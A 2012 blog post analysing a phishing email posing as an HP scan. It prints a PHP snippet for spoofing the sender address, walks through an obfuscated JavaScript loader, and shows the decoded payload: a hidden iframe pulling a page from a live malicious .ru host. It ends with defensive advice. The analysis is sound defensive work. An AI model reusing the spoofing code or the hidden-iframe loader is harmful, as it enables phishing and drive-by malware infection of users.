Spamming/Phishing analysis

Posted on March 15, 2012

2


I just get a mail today, flagged as spam in my mailbox. As I didn’t have much to do today, I decided to have a look at it, and check what was the goal of the spammer. First let’s have a glance of what is spamming and phishing.

Spam is the use of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately.

Wikipedia

Everyone on internet has already seen spams,  those ads who propose new way to lose fat, or congratulate you because you are the Xst visitor and you won and iPad.Even though the number of spam is decreasing , the number of spam message per day is still quite high: about 50 billions on January 2011 (I know it’s an old news, but you get the idea).

Spam messages may be just an unsolicited advertise sent for marketing purpose, but sometimes (often?), the spammer use this technique for illegal purpose such as stealing information (e.g. credit card number) or installing a malware on victim’s computer. The spammer use another attack: The phishing.

Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

Wikipedia

The most widely recognized form of spam is e-mail spam, that’s how I got the phishing file (HTML document). Spammer use automatic script to browse the Internet to get as much email address as possible. They use regular expression looking for a string with something @ something . something. Regular expression are actually more complex to catch as much email address as possible. Spammer also use hoaxes and forwarded email chains to collect even more email addresses.

Analysis

Here is what I received. An email coming from “scanner@my-personal-domain.be” with the subject “Re:  Scan from a Hewlett-Packard ScanJet 112864“, and the content:

Attached document was scanned and sent

to you using a Hewlett-Packard ScanJet 265600K.
SENT BY: GRACE
PAGES : 5
FILETYPE: .HTML [Internet Explorer File]

This was kind of clever using an email with @my-personal-domain-be (actually something else, but I don’t want to tell you what’s my personal domain and email address) email address. If I was working in a company, this would have been really confusing getting an email from the user scanner, and if the spammer would have use a better way to send the mail, and deceive the mail service in order to avoid the spam flag, this attack would have been really effective.

Anyone can send easily an email with a custom sender address (e.g. obama@whitehouse.gov). For instance in PHP, you can use the code:

<?php
 $to = "recipient@example.com";
 $subject = "Hi!";
 $body = "Hi,\n\nHow are you?";
 $headers = "From: obama@whitehouse.gov\r\n" .
     "X-Mailer: php";
 if (mail($to, $subject, $body, $headers)) {
   echo("<p>Message sent!</p>");
  } else {
   echo("<p>Message delivery failed…</p>");
  }
 ?>

The mail embedded a HTML file named “HP_Scan-14-810409.htm“. I downloaded it and checked the code available here. It is a HTML page, with the title “Page 5“, with the text “Page is loading… ” and a javascript code. The code use two obfuscation techniques in order to make the code more complicated to read. The first one is that the text is condensate and the second is that the code has many ligne not required but make it longer to read. Let’s break the code in several lines:

if(window.document)
    aa=0+[];

It attributes the value “0” (and an empty array) to the variable aa. Since the array is empty, aa = 0. The if statement is always true if the page is open.

aaa='10'.substr(1);

It attributes the value of “10” starting from the second character to the variable aaa. It means aaa = 0.

try{
  new "a".prototype;
} catch (hgberger) {
  [...]
}

It creates a new object, if no error has been thrown, it executes what is in the catch. So actually it always execute what’s in the catch, so you don’t really have to care about this part.

if(aa===aaa)
  f=['-29s-29s67s64s-6s2s...'].split('s');

We know that aa = 0 and aaa = 0 so the if statement is always true. Then it attributes to the variable “f” an array of a substring from ‘-29s-29s67s64s-6s2s…‘ split with the ‘s‘ character. It means f = [-29][-29][67][64][-6][2]…

md='a';
e=window["e"+"val"];
w=f;
s=[];
r=String;

It attributes the character “a” to the variable “md“. md is never used.

The value of the variable “f” is set to the variable “w“.

It attributes an empty array to the variable “s“.

It creates a String object and set it to the variable “r“.

The line “e=window[“e”+”val”];” is a bit tricky, it actually creates an alias “e” for the function eval (“e” + “val”). eval() is used for executing its argument.

for(i=0;611!=i;i+=1)
{
  j=i;
  s=s+r.fromCharCode(38+1*w[j]);
}

fromCharCode() convert unicode values to character. The loop for convert for every substring of w (=f) + 38 into ASCII character:

-29 + 38 = 9 = TAB

-29 + 38 = 9 = TAB

67 + 38 = 105 = i

64 + 38 = 102 = f

-6 + 38 = 32 = SPACE

2 + 38 = 40 = (

etc

if (Math.round( (-1*2*2) * Math.tan(Math.atan(1/2)) ) == -3+1)
  e(s);
}

It round the value ( -4 * tan(atan(.5)) ). The tangent of the arctangent get back to the initial value. So the round of -4 * 0.5 ( = -2) equal -2. Since -2 = -3 +1, the if statement is always true and e(s); is executed. e() being eval() and s being the decoded value of w (f). But what exactly is the decoded value of w? Here is the value:

if (document.getElementsByTagName('body')[0]){
  iframer();
} else {
  document.write("http://dsakhfgkallsjfd.ru:8080/images/aublbzdni.php");
}

function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src','http://dsakhfgkallsjfd.ru:8080/images/aublbzdni.php');
  f.style.visibility='hidden';
  f.style.position='absolute';
  f.style.left='0';
  f.style.top='0';
  f.setAttribute('width','10');
  f.setAttribute('height','10');
  document.getElementsByTagName('body')[0].appendChild(f);
}

This code creates a hidden iframe that execute the page http://dsakhfgkallsjfd.ru:8080/images/aublbzdni.php. I didn’t understand what does exactly this php page, but since it is a hidden iframe with a php hosted on a Russian domain, I guess aublbzdni.php has an unethical purpose.

Countermeasure

Here are different quick countermeasures against this attack. First of all stop forwarding those hoaxes and stupid email chain. If you need to put your email address on the Internet, use an image. Even if recognition application already exist, it will highly decrease the risk that a spammer collect your address. Nevertheless I would recommend to use a contact page with a captcha. No one will see your email address, and robot might be stop if you use a good captcha system.

I would also suggest you to be very suspicious whenever you receive a mail from someone you don’t know or pseudo automatic message from service you know. If you have any doubt, the best is to contact the IT administrator/helpdesk/etc.

Lastly, using an addon such as NoScript disable all javascript codes. This means the script described in this post wouldn’t be executed. The problem is that lots of website need javascript to work properly, but you can disable NoScript on particular domain you trust.

Advertisements
Posted in: News